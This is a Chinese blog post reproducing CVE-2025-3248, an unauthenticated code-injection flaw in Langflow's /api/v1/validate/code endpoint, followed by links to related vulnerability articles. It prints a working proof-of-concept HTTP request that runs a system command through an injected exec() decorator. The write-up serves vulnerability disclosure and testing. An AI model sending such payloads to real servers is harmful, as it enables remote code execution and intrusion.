Langflow框架远程命令执行漏洞(CVE-2025-3248)

最新推荐文章于 2025-07-29 18:00:39 发布
最新推荐文章于 2025-07-29 18:00:39 发布
阅读量862 收藏
点赞数 28
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 数据库 安全 web安全 网络 sql 漏洞复现 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jd_cx/article/details/148061113

问题描述

Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。‌是一个面向开发者的低代码工具,专注于多智能体人工智能、提示工程和检索增强生成(RAG)应用的开发。它能够帮助开发者轻松构建强大的AI智能体和工作流,通过可视化方式搭建AI应用,通过拖放操作创建复杂的AI工作流,从而降低开发门槛,减少编写样板代码的工作量,使开发者能够更多地专注于创新‌。Langflow 1.3.0之前版本存在安全漏洞,该漏洞源于/api/v1/validate/code端点存在代码注入漏洞,可能导致远程未经验证的攻击者执行任意代码。

poc

POST /api/v1/validate/code HTTP/1.1
Host: 127.0.0.1
Content-Type: application/jsonContent-Length: 125

{"code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"id\"]))')\ndef foo():\n  pass"}
Langflow 远程命令执行漏洞复现CVE-2025-3248)(附脚本)
iSee857的博客
04-10 982
1.3.0 之前的 Langflow 版本在/api/v1/validate/code 端点容易受到攻击。未经身份验证的远程攻击者可以发送精心编制的 HTTP 请求以执行任意命令。(CVE-2025-3248
Langflow /validate/code 远程代码执行漏洞(CVE-2025-3248)
m0_50125527的博客
04-10 575
Langflow 是一个基于 Python开发的低代码/无代码自然语言处理(NLP)工作流构建平台,专为开发者、数据科学家和业务人员设计,用于快速搭建、测试和部署 NLP 应用(如文本生成、分类或翻译)。其核心特性包括拖拽式可视化编程界面、预集成主流 AI 模型(如 OpenAI、Hugging Face),支持自定义模块扩展,并可通过 API 或 Docker 实现一键部署,显著降低 NLP 技术的应用门槛。
CVE-2025-3248Langflow 开源平台严重远程代码执行漏洞
m0_73070989的博客
06-06 560
摘要:CVE-2025-3248高危漏洞(CVSS 9.8)影响Langflow 1.3.0之前版本,攻击者可通过未授权访问/api/v1/validate/code端点,利用代码验证过程中exec()函数的不当调用执行任意命令。复现环境显示,攻击者通过函数装饰器注入恶意代码,可窃取数据或创建后门。PoC脚本证实漏洞存在,服务器响应看似正常但恶意代码已执行。建议用户立即升级至1.3.0及以上版本,新版已增加身份验证机制
AI挖0day漏洞?!AI黑客来了?!全球首个AI漏洞挖掘“神器“
weixin_75168674的博客
04-10 1541
🤖 AI 自动挖 0day?一周实测 vulnhuntr:是神器还是智商税?
LangChain 任意命令执行CVE-2023-34541)
蚁景网安学院
06-27 1443
LangChain是一个用于开发由语言模型驱动的应用程序的框架。在LangChain受影响版本中,由于load_prompt函数加载提示文件时未对加载内容进行安全过滤,攻击者可通过构造包含恶意命令的提示文件,诱导用户加载该文件,即可造成任意系统命令执行
API安全所面临的风险-学习笔记
why811的博客
08-03 1082
从银行、零 售、运输到物联网、自动驾驶汽车、智能城市,API都是现代移动、SaaS 和 Web应用程序的一个 关键组成部分,并且在面向客户、面向合作伙伴和面向内部的应用中都会使用到。一般来说,API会公开应用程序的逻辑和敏感数据,如:个人识别信息(PII),正因为如此, API越来越成为攻击者的目标。另外,如果提供的电子邮件地址没有在系统中注册,handlePasswordResetLink()方法将以BAD REQUEST HTTP状态响应,泄露电子邮件是否在系统中注册的用户信息。
漏洞预警:LangChain的可视化开发神器LangFlow漏洞预警【CVE-2025-3248
weixin_47946540的博客
05-09 118
LangFlow作为LangChain的可视化开发神器,Github start 59.4k,在大模型应用程序构建过程被大量用户使用。用户可以通过简单的拖拽操作迅速构建复杂的 AI 工作流。它支持多代理的编排、Python 自定义编程以及各种预构建的组件和模板。除此之外,LangFlow 提供了实时测试、API 发布等功能,广泛应用于聊天机器人、文档分析、内容生成等领域,支持云端或本地部署,适合快速实验和轻量化解决方案的实现。
centos8的openssh9.9p2 RPM包,解决漏洞CVE-2025-26465 和 CVE-2025-26466
03-04
OpenSSH 9.9p2版本是在CentOS 8环境下,针对两个安全漏洞CVE-2025-26465和CVE-2025-26466进行修复的升级版本。CVE-2025-26465漏洞描述为在处理加密过程中的边界条件时可能导致服务崩溃,而CVE-2025-26466则是由于...
XWiki SolrSearch接口存在远程命令执行漏洞CVE-2025-24893
nnn2188185的博客
05-06 244
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发。
openssh-9.9p2的rpm包适用于redhat6/7,centos6/7,修复中危安全漏洞 CVE-2025-26465 和 CVE-2025-26466
03-11
该版本对OpenSSH进行了更新,并修复了两个中危安全漏洞,即CVE-2025-26465和CVE-2025-26466。这些漏洞的修补对于保护系统安全至关重要,因为OpenSSH是一种广泛使用的开源软件,它提供了安全远程登录和其它网络服务...
Langflow 小于1.3.0之前存在rce漏洞 CVE-2025-3248
misu6的博客
04-11 385
Langflow是用于构建和部署 AI 驱动的代理和工作流的强大工具。它为开发人员提供了可视化创作体验和内置 API 服务器,该服务器将每个代理转变为 API 终端节点,该终端节点可以集成到基于任何框架或堆栈构建的应用程序中。Langflow 随附电池,支持所有主要的 LLM、矢量数据库和不断增长的 AI 工具库。
DeepSeek本地化部署有风险!快来看看你中招了吗?
Tencent_SRC的博客
02-17 2951
2025年伊始,AI领域迎来一个重要变革 - DeepSeek R1开源发布,凭借着低成本、性能出众的优势,这个模型在短短几周内就获得空前关注。由于官网服务经常繁忙,大家开始选择使用Ollama+OpenWebUI、LM Studio等工具进行本地快速部署,从而将AI能力引入企业内网和个人PC环境。近期腾讯朱雀实验室发现:这些广受欢迎的AI工具中普遍存在安全漏洞。如果使用不当,攻击者可能窃取用户数...
AI开发工具Langflow高危漏洞遭活跃利用,可导致服务器任意代码执行
FreeBuf_的博客
05-07 401
Langflow高危漏洞利用,可远程执行任意代码,企业需紧急修复。
漏洞分析 | LangChain代码注入漏洞CVE-2023- 36281)
WangsuSecurity的博客
01-25 1171
LangChain 0.0.171版本存在代码注入漏洞远程攻击者可以通过load_prompt函数的JSON文件来执行任意代码。
Goby AI大模型漏洞安全通告| Langflow /api/v1/validate/code 代码执行漏洞CVE-2025-3248
m0_46699477的博客
04-09 347
LangFlow 是一款基于 Python 的低代码可视化 AI 应用构建工具,专注于多智能体人工智能(Multi-Agent AI)、提示工程(Prompt Engineering)和检索增强生成(RAG, Retrieval-Augmented Generation)应用的开发,github star 54.5k,在AI领域中被广泛应用。 1.3.0之前的Langflow版本存在远程代码执行漏洞,攻击者可以通过/api/v1/validate/code端点发送精心构造的HTTP请求,执行任意代码。
Redis 键值对操作详解:Python 实现指南
最新发布
AI浩
07-29 966
场景推荐操作替代方案添加小数据SETHSET(对象)添加大数据HSET/MSET分批次添加添加临时数据SETEX删除小数据DELETEUNLINK删除大数据UNLINK无批量操作管道 + MSET/UNLINK单独命令添加操作使用set()添加单个键值对使用mset()批量添加多个键值对使用setex()添加带过期时间的键值对删除操作优先使用unlink()进行删除(尤其大型数据)仅在需要立即释放内存时使用delete()批量删除时结合管道提高效率。
MyBatis-Plus 与 Spring 新手指南
qq_31619295的博客
07-25 1258
泛型机制: 确保类型安全和代码提示继承体系: 提供丰富的基础功能注解映射: 简化配置,提高开发效率Spring集成: 无缝融入Spring生态掌握这些核心概念,就能快速理解和使用MyBatis-Plus进行数据访问层开发。
Redis 服务挂掉排查与解决
qq_33665793的博客
07-28 1236
Redis服务挂掉的排查与解决方法 摘要: 当出现"RedisException in Redis.php line 63 Connection refused"错误时,表明Redis服务无法连接。本文总结了常见原因:服务未启动、网络问题、配置错误或内存不足等,并提供了系统的排查步骤:1)检查Redis进程状态;2)查看服务运行状态;3)启动/重启服务;4)检查配置文件;5)查看错误日志。同时介绍了内存调整、防火墙配置和自动重启等解决方案.
WinRAR远程执行漏洞CVE-2023-38831解析及防范
根据提供的文件信息,以下是对CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC的详细知识点介绍: **标题知识点** 1. **CVE-2023-38831漏洞概述** - CVE是“Common Vulnerabilities and Exposures”的缩写,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值